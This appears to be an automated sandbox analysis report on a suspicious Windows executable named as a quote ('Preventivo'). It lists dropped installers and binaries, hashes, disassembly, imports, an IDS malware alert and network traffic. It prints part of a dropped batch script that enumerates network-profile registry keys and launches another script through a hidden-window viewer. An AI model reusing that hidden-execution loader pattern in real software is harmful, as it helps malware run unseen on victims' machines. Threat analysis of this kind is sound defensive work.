                      SHA1:E3A30BC84D733ED907A2CBBFC3F5E16900A5B2CE
                      SHA-256:0D44439A0425DF8ABF338BD1496679A144DD705A51832A05C1A4ED1F76756EBA
                      SHA-512:D7A8AC4E9D824DCB1C8AF5574E7818ED6F515A75C47F50AB380492F87CF0D0AC853956DD93262286C064FFE5E48CEC899A960DD20E466B74E911C88975AB3E0B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...........h......h.....h......U......U...b..U......h........................A..........Rich...........PE..L......_...........!.........$.......j...................................................@..........................u.......u..........................`............1..p...........................P2..@............................................text...o........................... ..`.rdata..............................@..@.data....+...........p..............@....SharedD............................@....rsrc...............................@..@.reloc...........0..................@..B................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):799
                      Entropy (8bit):5.23166754615022
                      Encrypted:false
                      SSDEEP:24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7oy:6oo7urwEiNUoy
                      MD5:FD877AE342E4E8B246D11700EB90B23D
                      SHA1:9C1790DB6B9CBD9C5BF2B12B8FBCF6A342A6FD3A
                      SHA-256:1CE4768F825372D55C1D30CE3AC41AFB913DE6299A64AE5B0AC1B3B752421D64
                      SHA-512:2B26CAE19DC5C485076C6C8C740F5E621F1B507163D26FB8E31CCE78F6917A170FE9D9BA0976E7C6079ED50F448FCEA1C365E0B3F4C522981C10330C04932E99
                      Malicious:false
                      Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..start C:\Games\viewer.exe /HideWindow C:\Games\c.cmd..EXIT
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):4
                      Entropy (8bit):2.0
                      Encrypted:false
                      SSDEEP:3:4Q:4Q
                      MD5:F24F62EEB789199B9B2E467DF3B1876B
                      SHA1:DE3AC21778E51DE199438300E1A9F816C618D33A
                      SHA-256:E596899F114B5162402325DFB31FDAA792FABED718628336CC7A35A24F38EAA9
                      SHA-512:C2636AD578F7B925EE4CF573969D4EC6640DE7B0176BF1701ADECE3A75937DC206AB1B8EE5343341D102C3BED1EC804A5C2A9E1222A7FB53A3CC02DA55487329
                      Malicious:false
                      Preview:exit
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Category:dropped
                      Size (bytes):976384
                      Entropy (8bit):6.553744622059538
                      Encrypted:false
                      SSDEEP:24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
                      MD5:AA6C669C39D9BE8B6289F10DAAFBA6F3
                      SHA1:A7A73BD177B58847F42DAE48DA443E33482DD337
                      SHA-256:C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
                      SHA-512:1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
                      Malicious:false
                      Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):2648008
                      Entropy (8bit):6.675995874896264
                      Encrypted:false
                      SSDEEP:49152:Z2snRpZfSwHuWoeeArWCPu6xec3dAAUA/JNw:YsR7Xl7pu6x/I
                      MD5:663FE548A57BBD487144EC8226A7A549
                      SHA1:6F3E790D8E42A7C1655C37A64852BAB9EEAADCEE
                      SHA-256:3FB38EEFB8DB4D52BE428FACC8A242997AB2AD58A8D08980A7688C9BF0B30454
                      SHA-512:63203A0FC98E9158AEB5C668FE093A1B1C11565D1222F48F259325EE2E715038A2585F9C307047E33FA778877C2129D926A0D15BFED6B6638E4AE01B78786A6B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 8%
                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......+.meo..6o..6o..6...7c..6...7...6...7{..6...6a..6=..7{..6=..7u..6=..7_..6...7H..6o..6C..6...7n..6o..6...6...7r..6...7..6...7n..6...6n..6o..6n..6...7n..6Richo..6........PE..L...3*4e.....................>......3.............@.......................... 0.......(...@.................................d...,.....".(............@(..'...`/. ...`~..8............................~..@............................................text...F........................... ..`.rdata..z=.......>..................@..@.data...............................@....rsrc...(.....".....................@..@.reloc.. ....`/.......'.............@..B................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):412832
                      Entropy (8bit):6.584221629525791
                      Encrypted:false
                      SSDEEP:12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
                      MD5:29ED7D64CE8003C0139CCCB04D9AF7F0
                      SHA1:8172071A639681934D3DC77189EB88A04C8BCFAC
                      SHA-256:E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
                      SHA-512:4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):87728
                      Entropy (8bit):6.419830608221278
                      Encrypted:false
                      SSDEEP:1536:IOmWBhamWHh2ZAErVlIwHnURbrK3qCLZO8asWgcdle0yBCaaeJH47EcS:IOmo9rJVltnURbMsxletBCaaeJH47EcS
                      MD5:7065625D4F5E1730EADE5A9B4B5A6948
                      SHA1:A8F96C8708E0BD23FC9F0B959C49863080A188DD
                      SHA-256:4D12FEBD622266220AA2DD2074972EE82545C144DC599F68866212A29DB9F442
                      SHA-512:A55E9F1581E3410989EE9C0DAC394E0CF3E3085CAF623F6082E2B3C06A776789B86B87CF17CEEAF582B762B2D6B3C1D554B67A91AE7F87782BC5B6DCCD082186
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... . -djN~djN~djN~p.M.njN~p.K..jN~p.J.vjN~..K.EjN~..J.kjN~..M.ujN~p.O.mjN~djO~.jN~..K.ejN~..N.ejN~...~ejN~dj.~ejN~..L.ejN~RichdjN~........................PE..L...o.&a...........!.................%..............................................&................................'.......(..d....`...............<.......p..........T...........................0...@............................................text............................... ..`.rdata...a.......b..................@..@.data........@......................@....rsrc........`.......&..............@..@.reloc.......p.......,..............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
                      Category:dropped
                      Size (bytes):2615808
                      Entropy (8bit):6.621481030425916
                      Encrypted:false
                      SSDEEP:49152:tt/eWK9YwPhH9D+g5jv5m36W547vB+gjB1JMDhB5geIF/bseA:zmD+cmqvPjB1cE
                      MD5:ADC098D9A02A0A0710E8A7D6D2BFEA1D
                      SHA1:46167254D9A5475A3D0A36DCDB7F4031A8B148D1
                      SHA-256:B73B46F35142989A10C91AA887F94037271B8EE7148CC3BFB061AE9848ED1FD9
                      SHA-512:6B8C29E98E246BC60FD612DC9ACC80760000EE9867A7B656B9CD4201831559A62C1DB9278282E6F63692EE7EE71DEEC62163C8C41F9174D7255BFD1427B6CF8F
                      Malicious:false
                      Preview:......................>...................(...................................M.......f.......S...T...U...V...W...X...Y.......O...P...Q...R...S...T...U...V...W...X...Y...Z...?...@...A...B...C...D...E...F...G...H...I...J...K...L.......................................................................................................................................................................................................................................................................................................<...................1...;....................................................................................... ...!..."...#...$...%...0...'...(...)...*...+...,...-......./.......2...8...3...4...5...6...7...<...9...:...C...F...=...>...?...@...A...B...C...D...E...O...G...H...I...J...K...L...F.......O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4488558
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:E819399D28E8E9609668E3A7D70D66A6
                      SHA1:F0DD69687E297372EEFD387BA470EFC23A40F7A8
                      SHA-256:54B022ED416A22F82DF0B5C7A360E3923AF35ACEE6A6BAC7410B53B5EC8FBB63
                      SHA-512:A0429517A6B86084267230E47404195C15C330B5F9F567693924B702CE7874DACD47B273F0964442C1BE3E97D11962189D2F0B07D24EB8A9AED9C26470278925
                      Malicious:false
                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                      File Type:ASCII text, with CRLF, CR line terminators
                      Category:dropped
                      Size (bytes):28
                      Entropy (8bit):4.208966082694623
                      Encrypted:false
                      SSDEEP:3:nLWGWNI3ov:nyGWNOov
                      MD5:F2CE4C29DC78D5906090690C345EAF80
                      SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                      SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                      SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                      Malicious:false
                      Preview:No Instance(s) Available....
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):41
                      Entropy (8bit):4.1874503350805945
                      Encrypted:false
                      SSDEEP:3:OT2egJgkuLekbevn:OC39uLevn
                      MD5:C80A61EC2FFEB4F20A47DF967C372762
                      SHA1:D8C7166F59BB7022A966455DE5256C9A248D8B07
                      SHA-256:B29385F78B29999A6E4A4133262F5AF567372A4E30C4023E20AD0899B023B76E
                      SHA-512:CFB36B5FD2B5B17F9B93EC4D83286CD6F1F7B56FEC378F816055B46075386E5D9763B2435D0685410002934E74FFC94EA2E822E18C732CD5D0032856F87FAE89
                      Malicious:false
                      Preview:Environment variable GUID[ not defined..
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.141133782753418
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Preventivo24.01.11.exe
                      File size:5'955'744 bytes
                      MD5:32f35b78a3dc5949ce3c99f2981def6b
                      SHA1:18a24aa0ac052d31fc5b56f5c0187041174ffc61
                      SHA256:0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
                      SHA512:e14962926f7544f894b84b3091b884b2f9b54c8b40e44e55c43b2df112d68555ddfca268353e278651cc7994011e456ac4515f1b7f0787e499f19dbd75d95cb5
                      SSDEEP:98304:7azvMgOJRWT7tRyYsQdTEDdoJr7dJDqpbhUwkasM+u1JfJXibUPHI:7azvMgOJRWT7ukTE5oNqZX1WUA
                      TLSH:0C569D30B15AC62ED56241F1192CDAAB911D6D3A0F6190DBB3DC7E6F2BB04C35236E27
                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ul..1...1...1...............0...7...%...7...(...7...\.......=.......*.......8.......0...1.......\.......\.l.0...1...0...\...0..
                      Icon Hash:30281012004140c2
                      Entrypoint:0x60b100
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6582CD64 [Wed Dec 20 11:17:56 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:36aca8edddb161c588fcf5afdc1ad9fa
                      Signature Valid:false
                      Signature Issuer:CN=CodeSigningCert
                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                      Error Number:-2146762487
                      Not Before, Not After
                      • 28/02/2023 11:15:47 28/02/2025 11:25:47
                      Subject Chain
                      • CN=CodeSigningCert
                      Version:3
                      Thumbprint MD5:5082070071D2E70CFB8AF6145E2E0DAD
                      Thumbprint SHA-1:A1846ABF798522A5B115A90F5C3283CE050626F2
                      Thumbprint SHA-256:0C21B06B3EDE50F24284DDB567B4370193279F3E59A9A1BB602D9A9C230B4D28
                      Serial:12E79E88324CCEA94E0358CCB4A75075
                      Instruction
                      call 00007FED44B96F8Bh
                      jmp 00007FED44B967CDh
                      push ebp
                      mov ebp, esp
                      and dword ptr [0074EC4Ch], 00000000h
                      sub esp, 24h
                      or dword ptr [0074B020h], 01h
                      push 0000000Ah
                      call dword ptr [00697268h]
                      test eax, eax
                      je 00007FED44B96B02h
                      and dword ptr [ebp-10h], 00000000h
                      xor eax, eax
                      push ebx
                      push esi
                      push edi
                      xor ecx, ecx
                      lea edi, dword ptr [ebp-24h]
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      nop
                      mov dword ptr [edi], eax
                      mov dword ptr [edi+04h], esi
                      mov dword ptr [edi+08h], ecx
                      xor ecx, ecx
                      mov dword ptr [edi+0Ch], edx
                      mov eax, dword ptr [ebp-24h]
                      mov edi, dword ptr [ebp-20h]
                      mov dword ptr [ebp-0Ch], eax
                      xor edi, 756E6547h
                      mov eax, dword ptr [ebp-18h]
                      xor eax, 49656E69h
                      mov dword ptr [ebp-04h], eax
                      mov eax, dword ptr [ebp-1Ch]
                      xor eax, 6C65746Eh
                      mov dword ptr [ebp-08h], eax
                      xor eax, eax
                      inc eax
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      nop
                      lea ebx, dword ptr [ebp-24h]
                      mov dword ptr [ebx], eax
                      mov eax, dword ptr [ebp-04h]
                      or eax, dword ptr [ebp-08h]
                      or eax, edi
                      mov dword ptr [ebx+04h], esi
                      mov dword ptr [ebx+08h], ecx
                      mov dword ptr [ebx+0Ch], edx
                      jne 00007FED44B96995h
                      mov eax, dword ptr [ebp-24h]
                      and eax, 0FFF3FF0h
                      cmp eax, 000106C0h
                      je 00007FED44B96975h
                      cmp eax, 00020660h
                      je 00007FED44B9696Eh
                      cmp eax, 00020670h
                      je 00007FED44B96967h
                      cmp eax, 00030650h
                      je 00007FED44B96960h
                      cmp eax, 00030660h
                      je 00007FED44B96959h
                      cmp eax, 00030670h
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3491080x3c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3590000x56a58.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x5adb100x590
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b00000x2d550.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2eb4b00x70.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x2eb5400x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bcb500x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x2970000x320.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3463bc0x260.rdata
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x295bca0x295c009df1023178e489408abd4de59ea6f5ecunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x2970000xb33620xb34001a85f2a6b8a9c3902456bab47389e1feFalse0.32838378225244075data5.079377208024134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x34b0000xcc000x340097e28501cab3e5e33657a71481a58ba7False0.23963341346153846data4.542379696709195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .didat0x3580000x7100x8001b38fc929380aabe59305fcde2681d14False0.40966796875data4.5338796899883915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x3590000x56a580x56c0041897894c7d6aefff121b66fdd927208False0.11699049891930836data4.274410528854854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x3b00000x2d5500x2d600b8dcb36c465b4630e3506c3a7521632fFalse0.4789568267906336data6.568383422414792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_BITMAP0x3598e00x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                      RT_BITMAP0x359a200x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                      RT_BITMAP0x35a2480x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
                      RT_BITMAP0x35eaf00xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                      RT_BITMAP0x35f55c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                      RT_BITMAP0x35f6b00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                      RT_ICON0x35fed80x2b528Device independent bitmap graphic, 256 x 336 x 32, image size 172032, resolution 2834 x 2834 px/mEnglishUnited States0.11184685090843514
                      RT_ICON0x38b4000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08703319502074688
                      RT_ICON0x38d9a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.16463414634146342
                      RT_ICON0x38ea500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18565573770491803
                      RT_ICON0x38f3d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3262411347517731
                      RT_DIALOG0x38f8400xacdataEnglishUnited States0.7151162790697675
                      RT_DIALOG0x38f8ec0xccdataEnglishUnited States0.6911764705882353
                      RT_DIALOG0x38f9b80x1b4dataEnglishUnited States0.5458715596330275
                      RT_DIALOG0x38fb6c0x136dataEnglishUnited States0.6064516129032258
                      RT_DIALOG0x38fca40x4cdataEnglishUnited States0.8289473684210527
                      RT_STRING0x38fcf00x234dataEnglishUnited States0.4645390070921986
                      RT_STRING0x38ff240x182dataEnglishUnited States0.5103626943005182
                      RT_STRING0x3900a80x50dataEnglishUnited States0.7375
                      RT_STRING0x3900f80x9adataEnglishUnited States0.37662337662337664
                      RT_STRING0x3901940x2f6dataEnglishUnited States0.449868073878628
                      RT_STRING0x39048c0x5c0dataEnglishUnited States0.3498641304347826
                      RT_STRING0x390a4c0x434dataEnglishUnited States0.32899628252788105
                      RT_STRING0x390e800x100dataEnglishUnited States0.5703125
                      RT_STRING0x390f800x484dataEnglishUnited States0.39186851211072665
                      RT_STRING0x3914040x1eadataEnglishUnited States0.44081632653061226
                      RT_STRING0x3915f00x18adataEnglishUnited States0.5228426395939086
                      RT_STRING0x39177c0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                      RT_STRING0x3919940x624dataEnglishUnited States0.3575063613231552
                      RT_STRING0x391fb80x660dataEnglishUnited States0.3474264705882353
                      RT_STRING0x3926180x2e2dataEnglishUnited States0.4037940379403794
                      RT_GROUP_ICON0x3928fc0x14dataEnglishUnited States1.2
                      RT_VERSION0x3929100x30cdataEnglishUnited States0.441025641025641
                      RT_HTML0x392c1c0x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                      RT_HTML0x3964540x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                      RT_HTML0x39776c0x8c77HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.08081426068578103
                      RT_HTML0x3a03e40x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                      RT_HTML0x3a6eb40x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                      RT_HTML0x3a75580x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                      RT_HTML0x3a85a40x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                      RT_HTML0x3a9b580x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                      RT_HTML0x3abbb40x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                      RT_MANIFEST0x3af2440x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024
                      DLLImport
                      KERNEL32.dllWriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, CloseHandle, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, LoadLibraryA, CreateFileW
                      imagehlp.dllSymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308TCP2834928ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)4970580192.168.2.593.184.216.34
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 23, 2024 12:17:58.867115021 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:17:58.969831944 CET804972993.184.216.34192.168.2.4
                      Jan 23, 2024 12:17:58.969996929 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:17:58.970385075 CET4972980192.168.2.493.184.216.34
